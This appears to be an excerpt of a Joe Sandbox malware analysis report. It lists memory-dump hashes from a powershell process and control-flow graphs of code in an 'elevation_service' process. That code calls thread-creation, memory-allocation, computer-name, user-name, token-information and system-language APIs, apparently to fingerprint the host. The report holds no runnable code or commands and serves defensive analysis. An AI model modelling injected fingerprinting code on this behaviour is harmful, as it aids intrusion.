                                                                                                                                                                                                                                      • Instruction ID: a2f9fe3ca82b36ad996fbc812632f44e3fd47d4d8276ff096651b9da63e91bad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7c585e1e95265ff63930e2ef457092e31763c5901fa9a9c428fe592804b2ace
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CF135B17042499FC7259B68D80076AFBA2AFC6311F19C4BBDA45CB392DB31CC95C7A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: tM%l$`_q$`_q$`_q$`_q
                                                                                                                                                                                                                                      • API String ID: 0-3961299512
                                                                                                                                                                                                                                      • Opcode ID: 77e73c342c45b0b69ae75376fbf66e92b6047651b8bdb8ff71caec40fb09aee5
                                                                                                                                                                                                                                      • Instruction ID: 28bc7b45d71ff6014da42aeb50c31fb4754c1ffbb9fc1634fb34265833333c61
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77e73c342c45b0b69ae75376fbf66e92b6047651b8bdb8ff71caec40fb09aee5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AB1B774E012199FDB54DFA9D990A9EFBF2FF88304F108629D819AB354DB30A945CF90
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: tM%l$`_q$`_q$`_q$`_q
                                                                                                                                                                                                                                      • API String ID: 0-3961299512
                                                                                                                                                                                                                                      • Opcode ID: 1512e26e7b5c5439db3a0f2ce6824a91097c847317cd97fa2d0c6e1bf282d10b
                                                                                                                                                                                                                                      • Instruction ID: c75ec158b5403dca0446968b0a9cb33155912d1d8914f9b350247d2313a0a4f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1512e26e7b5c5439db3a0f2ce6824a91097c847317cd97fa2d0c6e1bf282d10b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72B1C674E012199FDB54DFA9D980A9EFBF2FF88304F108629D819AB354DB30A945CF90
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                                                      • API String ID: 0-3272787073
                                                                                                                                                                                                                                      • Opcode ID: 446eb314ca4652e6cd41c2f389b529c3a2555b56056f303a1d2caf49c59b78fd
                                                                                                                                                                                                                                      • Instruction ID: 57552d35f382d94391a65e1475ae44f008b469c5f359c2d89fbdebc9461a7825
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 446eb314ca4652e6cd41c2f389b529c3a2555b56056f303a1d2caf49c59b78fd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D75157F170430A9FCB245B299800767FBB6AFC6610F27846BDA85CB351DB35C895C7A1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                                      • API String ID: 0-3297199963
                                                                                                                                                                                                                                      • Opcode ID: bb0adedd2a341ef6acb68cf86d55d527071795c9989cb8df682bdce444a76e66
                                                                                                                                                                                                                                      • Instruction ID: aed90649220aea46c18090ba63bdef63c1d9a0e8a103bc4ee4937289d0c95a2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb0adedd2a341ef6acb68cf86d55d527071795c9989cb8df682bdce444a76e66
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB816474E012199FDB54DFA9D990A9DFBF1FF48300F20862AE819AB354E770A945CF90
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                      • API String ID: 0-2125118731
                                                                                                                                                                                                                                      • Opcode ID: 062f8acec5d016b38ad160b494a24a7a59e64832de7fa6fd064560e0fa597083
                                                                                                                                                                                                                                      • Instruction ID: 7d78ab13444a36db39db1f5c6c616225191f0b31d5be37c2d4d7a4d478020c41
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 062f8acec5d016b38ad160b494a24a7a59e64832de7fa6fd064560e0fa597083
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B72138B170420AABDB345A7AA800B27FBDBAFC0711F25843AAA47CF385DD75C8558361
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: pij$pij$J&l$J&l
                                                                                                                                                                                                                                      • API String ID: 0-1627512543
                                                                                                                                                                                                                                      • Opcode ID: 0dda98cca6a85d8f78cf1771b59322b13e67a61661c3ee6cef70c3dd58b52120
                                                                                                                                                                                                                                      • Instruction ID: 2b186994baaa1c80a23e20eeaf6939c4c3b1daa314f33c748a14f6528eb867cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dda98cca6a85d8f78cf1771b59322b13e67a61661c3ee6cef70c3dd58b52120
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA31B3F190430AEFDB20DF55C5416AEFBF0BB51310F0A806ADA988B251C775F985CBA2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $^q$$^q$J&l$J&l
                                                                                                                                                                                                                                      • API String ID: 0-3689461234
                                                                                                                                                                                                                                      • Opcode ID: 325488d5cca68d5b2a3ee44da3484212784ea754359a05b1eb33dc8c533fc3bc
                                                                                                                                                                                                                                      • Instruction ID: 4e73a3ef7a6debad684e2023a6fbdc728c9840b8d9306c7a6d209d7052a485b8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 325488d5cca68d5b2a3ee44da3484212784ea754359a05b1eb33dc8c533fc3bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E1108B26087454FC332522C9C2055BEFA67FD2710B1A85A7D684DF67ACA349C89C3B6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                                      • API String ID: 0-2049395529
                                                                                                                                                                                                                                      • Opcode ID: f4a5f81e6f364ae2b57ad13b9e1fd47adb37dfb2065db42eceae8a39c5ffad82
                                                                                                                                                                                                                                      • Instruction ID: 06465005ef6f5501364d0f017cc291f811332bfd56bf3f3939a34aede635a1f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4a5f81e6f364ae2b57ad13b9e1fd47adb37dfb2065db42eceae8a39c5ffad82
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62012B6170C3864FC72A17381820216EFF26F82A60B1A8597C580CF39BDE158C498393

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:98%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:98
                                                                                                                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                                                                                                                      execution_graph 5834 895b09 5835 895b16 5834->5835 5836 895cdf CreateThread 5835->5836 5837 895c01 5835->5837 5836->5835 5836->5837 5838 8954a0 5836->5838 5837->5837 5814 8955ef 5817 8955ac 5814->5817 5816 8955e9 5817->5816 5818 8b3870 5817->5818 5819 8b3876 5818->5819 5821 8b3893 5819->5821 5822 8b3720 5819->5822 5821->5817 5824 8a0c42 5822->5824 5823 89e050 VirtualAlloc 5823->5824 5824->5822 5824->5823 5825 8b37dd 5824->5825 5825->5821 5825->5825 5734 895b00 5735 895bba 5734->5735 5742 8a52c0 5735->5742 5737 895bc7 5741 895bde 5737->5741 5747 8b0080 5737->5747 5743 8a52c6 5742->5743 5746 8a52ce 5742->5746 5743->5746 5761 89e050 5743->5761 5746->5737 5753 8b0089 5747->5753 5748 8b03e0 GetComputerNameW 5748->5753 5749 8b0181 VirtualFree 5749->5753 5750 89e050 VirtualAlloc 5750->5753 5751 8b03bf GetUserNameW 5751->5753 5752 8b04d6 GetComputerNameW 5752->5753 5753->5748 5753->5749 5753->5750 5753->5751 5753->5752 5754 895c7b 5753->5754 5755 898070 5754->5755 5759 898075 5755->5759 5756 898186 CloseHandle 5756->5759 5757 8981ad GetTokenInformation 5757->5759 5758 8980ca GetTokenInformation 5758->5759 5759->5756 5759->5757 5759->5758 5760 8980a7 5759->5760 5760->5741 5762 89e0c3 5761->5762 5763 89e0d8 VirtualAlloc 5762->5763 5763->5762 5803 895860 5804 8a52c0 VirtualAlloc 5803->5804 5805 895869 5804->5805 5806 8b0080 5 API calls 5805->5806 5807 89587d 5806->5807 5808 898070 3 API calls 5807->5808 5809 895870 5808->5809 5764 895b42 5766 895b07 5764->5766 5766->5764 5768 895bb4 5766->5768 5769 895b68 5766->5769 5770 8952a0 5766->5770 5767 895cdf CreateThread 5767->5768 5767->5769 5774 8954a0 5767->5774 5768->5767 5768->5769 5773 8952ab 5770->5773 5771 8953c4 GetSystemDefaultLangID 5772 8952b0 5771->5772 5772->5766 5773->5771 5773->5772 5775 8954b5 5774->5775 5826 8955e4 5828 8955ac 5826->5828 5827 8b3870 VirtualAlloc 5827->5828 5828->5826 5828->5827 5829 8955e9 5828->5829 5781 895b87 CreateThread 5783 895b1c 5781->5783 5786 895810 5781->5786 5782 895cdf CreateThread 5782->5783 5784 895c01 5782->5784 5785 8954a0 5782->5785 5783->5782 5783->5784 5784->5784 5787 895822 5786->5787 5849 895347 5852 8952cb 5849->5852 5850 8953c4 GetSystemDefaultLangID 5851 895475 5850->5851 5852->5850 5853 8952b0 5852->5853 5728 8981b1 5732 898075 5728->5732 5729 898186 CloseHandle 5729->5732 5730 8981ad GetTokenInformation 5730->5732 5731 8980ca GetTokenInformation 5731->5732 5732->5729 5732->5730 5732->5731 5733 8980a7 5732->5733 5788 898090 5791 898075 5788->5791 5789 898186 CloseHandle 5789->5791 5790 8980ca GetTokenInformation 5790->5791 5791->5789 5791->5790 5792 8980a7 5791->5792 5793 8981ad GetTokenInformation 5791->5793 5793->5791 5830 8957f0 5831 8955ac 5830->5831 5832 8955e9 5831->5832 5833 8b3870 VirtualAlloc 5831->5833 5833->5831 5799 8952f4 5802 8952cb 5799->5802 5800 8952b0 5801 8953c4 GetSystemDefaultLangID 5801->5800 5802->5800 5802->5801 5794 8952b7 5795 8952b0 5794->5795 5796 8952c4 5794->5796 5796->5795 5797 8953c4 GetSystemDefaultLangID 5796->5797 5798 895475 5797->5798

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 290 8952a0-8952a5 291 8952ab-8952f5 290->291 292 89532e-89533f 290->292 291->292 294 8952f7-8953fe 291->294 297 89536b-89536f 292->297 300 8d0d4c-8d0d4e 294->300 301 895400-895424 294->301 298 895441-89544a 297->298 299 895375-895390 297->299 309 895450 298->309 310 8953c4-8953ca GetSystemDefaultLangID 298->310 305 8953c3 299->305 306 895392-89539a 299->306 307 89539b 301->307 308 89542a 301->308 306->307 311 89539d-8953a1 307->311 312 895413-895419 307->312 308->307 313 895430-89543e 308->313 322 895411 309->322 323 8953c1 309->323 314 895475-89547b 310->314 316 8952b0-8952b5 311->316 317 8953a7 311->317 313->298 314->300 317->316 318 8953ad 317->318 320 8953af-8953f1 318->320 321 8953f3-8953f9 318->321 320->312 320->321 327 89532a 321->327 328 895355 321->328 322->310 322->312 323->305 323->322 327->328 330 89532c 327->330 331 8952e8-895363 328->331 332 8952d1-8952e7 328->332 330->292 335 8953d1-8953d5 331->335 336 895365 331->336 332->331 335->311 337 8953d7 335->337 336->335 338 895367-895369 336->338 337->301 340 89534b 337->340 338->297 340->301 341 895351-895353 340->341 341->328
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 008953C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction ID: 2a6c15edf7c8c9812c0b5dac075b320166582ad0e518f84b31c7f152f2ccffc6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B441E59150DE998FDF27736448642707BA0FB233E6F9D04D7D487CB2E2E1984C81A76A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 8b0080-8b0286 2 8b0099-8b0575 0->2 3 8b028c 0->3 7 8b057b 2->7 8 8b0155 2->8 4 8b0445 3->4 4->2 6 8b044b-8b0457 4->6 10 8b0458-8b0472 GetComputerNameW 6->10 7->8 11 8b0581-8b0587 7->11 9 8b02ef-8b0495 call 89e050 * 2 8->9 9->10 52 8b043e 9->52 15 8b03ee-8b03f4 10->15 16 8b024c-8b0253 10->16 13 8b058b 11->13 18 8b058c-8b0591 13->18 19 8b0181 VirtualFree 13->19 40 8b00da-8b023f 15->40 41 8b03fa 15->41 20 8b01e6 16->20 21 8b0255 16->21 24 8b04ab-8b04af 18->24 25 8b0597 18->25 23 8b01a8-8b02ac call 8c7164 19->23 29 8b01ec-8b0313 call 8c715c 20->29 30 8b02b1-8b02be 20->30 26 8b02d3 21->26 23->30 49 8b04c7 24->49 25->24 32 8b059d 25->32 26->20 39 8b02d9 26->39 55 8b0318-8b031e 29->55 36 8b03bf-8b03d9 GetUserNameW 30->36 37 8b02c4 30->37 32->24 44 8b0331 36->44 37->36 45 8b02ca 37->45 39->9 40->16 53 8b0241-8b024a 40->53 41->40 46 8b0400 41->46 50 8b0171 44->50 51 8b0337 44->51 45->26 54 8bb1ee-8bb49f 46->54 58 8b04cc-8b04e6 call 8c9970 GetComputerNameW 49->58 59 8b013f-8b0146 50->59 60 8b0173 50->60 51->50 61 8b033d 51->61 52->4 53->16 53->30 56 8b0568-8b056b 55->56 57 8b0324 55->57 56->58 57->56 62 8b032a 57->62 69 8b04ec-8b0514 58->69 70 8b0131 58->70 59->13 64 8b0230 60->64 65 8b05d0-8b05d9 61->65 62->44 64->49 68 8b0236-8b05c2 64->68 65->54 68->49 72 8b05c8-8b05c9 68->72 69->56 73 8b0089-8b008c 70->73 74 8b0137 70->74 72->65 73->23 77 8b0092 73->77 74->73 75 8b013d 74->75 75->19 75->59 77->23 78 8b0098 77->78 78->2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction ID: 10862f6c7573f2bb94b889e2e11751930e7895474883e20c8d50b6159cd23d34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5D1F231418F0D8BCB28EF58D8497EBB7E1FBA0314F18461FD846C7265DA74DA498AC2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 79 898070-89817e 81 89813d-8981a5 79->81 82 898180 79->82 96 8981bd-8981ca 81->96 97 8981a7 81->97 83 89815f 82->83 84 898184 82->84 83->81 86 898161 83->86 87 89818c-898192 84->87 88 898186 CloseHandle 84->88 92 898163-898170 call 8c7164 86->92 89 898115-898118 87->89 90 898194 87->90 88->87 94 898119-89811a 89->94 95 8980a7 89->95 90->89 93 89819a 90->93 92->88 102 898172 92->102 99 89813c 93->99 94->95 100 89811c 94->100 107 8981d0 96->107 108 8980f3 96->108 99->84 103 89820f 100->103 102->87 105 89808e-898096 103->105 106 898215-89821e 103->106 105->84 105->95 106->105 118 898224 106->118 115 8981fe-898201 GetTokenInformation 107->115 116 8980c3 107->116 109 89808c 108->109 110 8980f5 108->110 109->105 110->109 117 898077 110->117 115->103 129 8981b7 115->129 116->115 120 8980c9 116->120 121 8981d7-8981de call 8c715c 117->121 118->121 122 898226 118->122 124 8980ca-8980d8 GetTokenInformation 120->124 127 8981e3-8981e6 121->127 122->121 125 898228-8982ee call 895d90 122->125 128 89810f 124->128 145 89830c-89831e 125->145 146 8982f0 125->146 127->124 143 898089 127->143 131 89812d 128->131 132 898111 128->132 129->103 135 8981b9-8981bb 129->135 138 8980a8 131->138 139 898133 131->139 132->131 136 898113 132->136 135->96 136->89 141 8980aa-8980ad 138->141 139->99 142 8981ed-8981f0 139->142 141->92 147 8980b3-898203 141->147 148 8980da-8980f1 142->148 149 8981f6 142->149 143->124 150 89808b 143->150 154 8982a1-8982ba call 895d90 call 89ec00 145->154 155 898320 145->155 146->145 151 8982f2 146->151 147->92 157 898209 147->157 148->141 149->148 153 8981fc 149->153 150->109 156 8982f7-8982fc call 895d90 151->156 153->115 154->155 155->156 160 898322 155->160 169 898253-898265 call 8b1280 156->169 170 898302 156->170 160->156 163 898324-898326 160->163 164 898328 163->164 174 8982df-89832b 164->174 175 898335 164->175 169->164 182 89826b 169->182 170->169 173 898308-89830a 170->173 173->145 174->175 179 89832d-898331 174->179 177 89826e-898285 175->177 180 89829b-89829d 177->180 181 898287 177->181 179->175 180->154 183 89824c 181->183 182->177 184 898239 182->184 183->180 186 89824e-898252 183->186 184->164 185 89823f-898243 184->185 185->156 185->183 186->177
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction ID: 50381fc56232b9b84b3b167dc1d46417445747ac318a92d7b92f80656cb7360f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A61FF3160CE4BDFCF65BB6888186357AA0FB57354F6C025AE447C32A1DF349C499752

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 187 895910-895912 188 895950-895968 187->188 189 895915-895928 call 8c9970 187->189 188->189 191 89596a 188->191 195 8959b8 call 8b0df0 189->195 192 89592f 191->192 193 895970-89597b 191->193 192->189 198 895931-8a072c 192->198 196 89597d 193->196 197 8959d4 193->197 207 8959bd-8959c2 call 895d90 195->207 196->197 199 89597f-895981 196->199 202 8959d8-8959de 197->202 203 89593b-895a15 call 8b11a0 197->203 204 8a0732-8a0738 198->204 205 8a0806-8a0809 198->205 206 895983-895a38 199->206 219 895994-89599c 202->219 223 8959e0 202->223 210 8a073e 204->210 211 8a0800 204->211 216 8a079d-8a07a6 205->216 218 895a3e 206->218 206->219 220 8959c7-8959ce 207->220 210->211 217 8a0744-8a0774 210->217 211->205 222 8a06b3-8a06b7 211->222 229 8a07a8 216->229 230 8a0791-8a0793 216->230 237 8a077a-8a081c 217->237 238 8a06d5-8a06d9 217->238 231 895a2c-895a34 218->231 226 89599e-8959f7 219->226 227 895a02 219->227 232 895a1a-895a26 220->232 233 8959d0 220->233 222->216 228 8a06bd 222->228 223->219 224 8959e2-8959ec 223->224 235 8959ee-8959ef 224->235 236 895a62-895a6e 224->236 226->227 227->193 228->216 240 8a06c3-8a07fe 228->240 229->230 242 8a07aa 229->242 241 8a07ca-8a07cc 230->241 243 8959d9-8959de call 8c2190 231->243 232->231 234 8959a1-8959b5 call 895e10 232->234 233->232 244 8959d2 233->244 234->195 261 895a08-895a0b 234->261 235->206 248 8959f1 235->248 246 895a70 236->246 247 895a75-895ab3 call 8b1280 236->247 237->216 252 8a06db 238->252 253 8a06df 238->253 240->211 242->241 243->219 243->223 244->243 246->247 259 895a72 246->259 277 895abb-895ac9 247->277 278 895ab5 247->278 248->189 252->253 257 8a06dd 252->257 253->216 257->253 262 8ac0cc 257->262 259->247 261->219 265 895a0d 261->265 263 8ac0e8-8ac102 262->263 264 8ac0ce-8ac0d0 262->264 267 8ac0d2-8ac0df 263->267 268 8ac104 263->268 264->267 270 895991 265->270 271 895932 265->271 276 8ac0e7 267->276 268->267 268->276 270->271 275 895993 270->275 275->219 279 895af2-895af5 277->279 278->277 280 895ab7-895ab9 278->280 284 895adb-895adc 279->284 285 895ad5 279->285 280->277 286 895ae2 284->286 287 895a45-895a46 284->287 285->284 288 895ad7-895ad9 285->288 286->287 289 895ae8 286->289 288->284 289->279
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction ID: 4e0866edc23fb9f6775eb0b4f66c61101d2e65ceca0e8b619865e3fba4522355
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F14A2071CE4C8FDB6AA71C68553FA77D1F79A324F58019EE08BC7396DD249C068786

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 342 895b42-895b47 call 895d90 344 895b4c-895b52 342->344 346 895b0d 344->346 347 895c42-895c62 call 8b1280 344->347 346->347 348 895b13 346->348 361 895c68 347->361 362 895c24 347->362 350 895c8f-895c96 348->350 352 895c29 350->352 353 895c98-895c9a 350->353 355 895c2f-895c36 352->355 356 895cc2-895cc9 call 8952a0 352->356 354 895c9c 353->354 366 895bfa 354->366 367 895d0e-895d18 354->367 355->356 360 895c3c 355->360 371 895c69 356->371 372 895ccb 356->372 360->342 363 895c14-895c19 362->363 364 895c26 362->364 368 895cc0 363->368 369 895c20-895c21 363->369 364->363 370 895c28 364->370 366->367 373 895c00 366->373 374 895d1a 367->374 375 895d54 367->375 368->356 369->361 370->352 377 895b68-895d75 371->377 378 895c6f 371->378 372->354 376 895ccd 372->376 373->363 379 895d4b-895d52 374->379 376->354 381 895ccf-895cdd 376->381 378->377 383 895c75 378->383 379->375 380 895d45-895d47 379->380 385 895d49 380->385 386 895d5f 380->386 384 895cdf-895ce4 CreateThread 381->384 383->350 387 895cea 384->387 388 895c01-895d41 384->388 385->379 385->386 390 895d65 386->390 387->388 391 895cf0-895cf6 387->391 388->379 399 895d43 388->399 390->390 391->369 392 895cff-895d01 391->392 394 895bb4 392->394 395 895d07 392->395 396 895cda-895cdd 394->396 395->394 398 895d0d 395->398 396->384 399->375
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction ID: 1f1fc768003e860bc5e49baf3f34d606b7aa48b54c72954de25b69e839a95820
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE21AC3020DF498FCFABBB28C8587746AE1FB5532CF6C05A69047CF2A6CA248C449356

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
